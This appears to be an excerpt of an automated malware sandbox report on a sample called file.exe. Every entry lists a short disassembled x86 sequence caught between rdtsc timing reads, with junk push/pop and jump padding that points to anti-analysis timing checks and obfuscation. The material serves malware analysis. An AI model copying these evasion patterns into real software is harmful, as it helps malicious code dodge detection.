              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D5CAD second address: 13D5CB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D66A6 second address: 13D66B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F76D9315E62h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D66B4 second address: 13D66BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D694B second address: 13D6951 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D6951 second address: 13D695D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D695D second address: 13D6975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F76D9315E61h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D6975 second address: 13D697F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D697F second address: 13D6989 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F76D9315E56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DA369 second address: 13DA36F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DA36F second address: 13DA373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DB2FB second address: 13DB2FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DB2FF second address: 13DB31D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D9315E67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC45D second address: 13DC461 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1D33 second address: 13E1D3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1D3C second address: 13E1D43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1D43 second address: 13E1D4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1D4E second address: 13E1D63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F76D8B730F6h 0x0000000c popad 0x0000000d jc 00007F76D8B73102h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1D63 second address: 13E1D71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F76D8DA98C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1D71 second address: 13E1D75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1600 second address: 13E163D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8DA98D7h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnl 00007F76D8DA98E0h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E163D second address: 13E1666 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F76D8B79F28h 0x00000008 jmp 00007F76D8B79F33h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push edi 0x00000011 jp 00007F76D8B79F26h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E190E second address: 13E1916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1916 second address: 13E193F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F76D8B79F28h 0x0000000b pop esi 0x0000000c pushad 0x0000000d jmp 00007F76D8B79F37h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E193F second address: 13E1945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1945 second address: 13E194B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1AB1 second address: 13E1AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1BE6 second address: 13E1BEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AE586 second address: 13AE5A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76D8DA98CCh 0x00000009 jmp 00007F76D8DA98CAh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AE5A0 second address: 13AE5A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AE5A9 second address: 13AE5B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E75C2 second address: 13E75E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 add dword ptr [esp], 307907CAh 0x0000000d mov di, 69FBh 0x00000011 call 00007F76D8B79F29h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E75E2 second address: 13E75E8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E75E8 second address: 13E7613 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8B79F2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F76D8B79F35h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E7613 second address: 13E7654 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F76D8DA98C8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007F76D8DA98CCh 0x00000015 mov eax, dword ptr [eax] 0x00000017 jg 00007F76D8DA98CAh 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 pushad 0x00000022 jmp 00007F76D8DA98D1h 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E79FC second address: 13E7A08 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E82DC second address: 13E82E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E84A9 second address: 13E84B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F76D8B79F26h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E85EA second address: 13E85FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 je 00007F76D8DA98CCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E87E5 second address: 13E882A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F76D8B79F39h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e cmc 0x0000000f xchg eax, ebx 0x00000010 push edx 0x00000011 jmp 00007F76D8B79F31h 0x00000016 pop edx 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F76D8B79F2Bh 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E966B second address: 13E9675 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F76D8DA98CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EA71A second address: 13EA785 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F76D8B79F28h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F76D8B79F28h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 sbb si, 1861h 0x0000002c call 00007F76D8B79F39h 0x00000031 mov edi, dword ptr [ebp+122D2B10h] 0x00000037 pop esi 0x00000038 push 00000000h 0x0000003a sub si, BC2Ah 0x0000003f push 00000000h 0x00000041 push eax 0x00000042 pop esi 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jno 00007F76D8B79F26h 0x0000004e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EA785 second address: 13EA78F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F76D8DA98C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EBB4D second address: 13EBB51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EBB51 second address: 13EBB55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EC777 second address: 13EC77E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EC47B second address: 13EC480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ED05D second address: 13ED061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EDB40 second address: 13EDB46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EDB46 second address: 13EDB4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F0E35 second address: 13F0EA1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D2026h], esi 0x0000000f js 00007F76D8DA98C9h 0x00000015 mov bx, cx 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007F76D8DA98C8h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 00000019h 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 call 00007F76D8DA98C8h 0x0000003e pop ecx 0x0000003f mov dword ptr [esp+04h], ecx 0x00000043 add dword ptr [esp+04h], 0000001Bh 0x0000004b inc ecx 0x0000004c push ecx 0x0000004d ret 0x0000004e pop ecx 0x0000004f ret 0x00000050 mov dword ptr [ebp+122D19DAh], ebx 0x00000056 xchg eax, esi 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b popad 0x0000005c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F2087 second address: 13F2099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 pushad 0x0000000a jc 00007F76D8B79F2Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F1021 second address: 13F1026 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F1113 second address: 13F1122 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F76D8B79F2Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F50F4 second address: 13F5170 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D2C1Ch], ebx 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F76D8DA98C8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007F76D8DA98C8h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 00000017h 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 pushad 0x00000049 xor dword ptr [ebp+12476451h], eax 0x0000004f mov eax, 459FF272h 0x00000054 popad 0x00000055 mov edi, dword ptr [ebp+122D2B34h] 0x0000005b xchg eax, esi 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007F76D8DA98D4h 0x00000065 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F5170 second address: 13F5176 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F6160 second address: 13F6164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F535C second address: 13F5360 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F5360 second address: 13F5384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F76D8DA98D8h 0x0000000b popad 0x0000000c push eax 0x0000000d push edi 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F71EA second address: 13F71EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F71EE second address: 13F71F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F6329 second address: 13F6350 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F76D8B79F37h 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F6350 second address: 13F63C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 mov edi, dword ptr [ebp+122D1BB5h] 0x0000000f mov ebx, edx 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov di, 3924h 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 stc 0x00000024 mov eax, dword ptr [ebp+122D074Dh] 0x0000002a jnc 00007F76D8DA98D3h 0x00000030 pushad 0x00000031 mov edi, 7D9FCAE0h 0x00000036 mov dword ptr [ebp+122D2C1Ch], ecx 0x0000003c popad 0x0000003d or dword ptr [ebp+1246C978h], edi 0x00000043 push FFFFFFFFh 0x00000045 push 00000000h 0x00000047 push esi 0x00000048 call 00007F76D8DA98C8h 0x0000004d pop esi 0x0000004e mov dword ptr [esp+04h], esi 0x00000052 add dword ptr [esp+04h], 00000019h 0x0000005a inc esi 0x0000005b push esi 0x0000005c ret 0x0000005d pop esi 0x0000005e ret 0x0000005f mov ebx, dword ptr [ebp+12449AA3h] 0x00000065 nop 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 push ecx 0x0000006a pop ecx 0x0000006b push edx 0x0000006c pop edx 0x0000006d popad 0x0000006e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F63C5 second address: 13F63CF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F76D8B79F2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FAFF9 second address: 13FB014 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8DA98D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FB014 second address: 13FB029 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F76D8B79F31h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FD19F second address: 13FD1A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FD1A4 second address: 13FD1CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F76D8B79F26h 0x00000009 jmp 00007F76D8B79F38h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FD1CD second address: 13FD1D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F9240 second address: 13F9248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F9248 second address: 13F9255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FA21B second address: 13FA2AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8B79F2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push edi 0x0000000b jl 00007F76D8B79F2Ch 0x00000011 pop ebx 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov dword ptr [ebp+122D21BFh], esi 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 jmp 00007F76D8B79F39h 0x0000002b mov eax, dword ptr [ebp+122D125Dh] 0x00000031 push 00000000h 0x00000033 push esi 0x00000034 call 00007F76D8B79F28h 0x00000039 pop esi 0x0000003a mov dword ptr [esp+04h], esi 0x0000003e add dword ptr [esp+04h], 0000001Ah 0x00000046 inc esi 0x00000047 push esi 0x00000048 ret 0x00000049 pop esi 0x0000004a ret 0x0000004b push FFFFFFFFh 0x0000004d jmp 00007F76D8B79F33h 0x00000052 push eax 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 popad 0x00000058 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F82FC second address: 13F8300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F8300 second address: 13F8306 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE1A7 second address: 13FE1C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8DA98D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE1C3 second address: 13FE1C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE1C7 second address: 13FE1CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FF28B second address: 13FF28F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FF28F second address: 13FF2AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F76D8DA98D7h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FF2AE second address: 13FF2C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a js 00007F76D8B79F26h 0x00000010 pop edx 0x00000011 pushad 0x00000012 jno 00007F76D8B79F26h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1404199 second address: 140419F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A2C01 second address: 13A2C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A2C05 second address: 13A2C27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F76D8DA98D6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140A5A1 second address: 140A5B5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F76D8B79F26h 0x00000008 js 00007F76D8B79F26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140A5B5 second address: 140A5B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1409D9C second address: 1409DA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
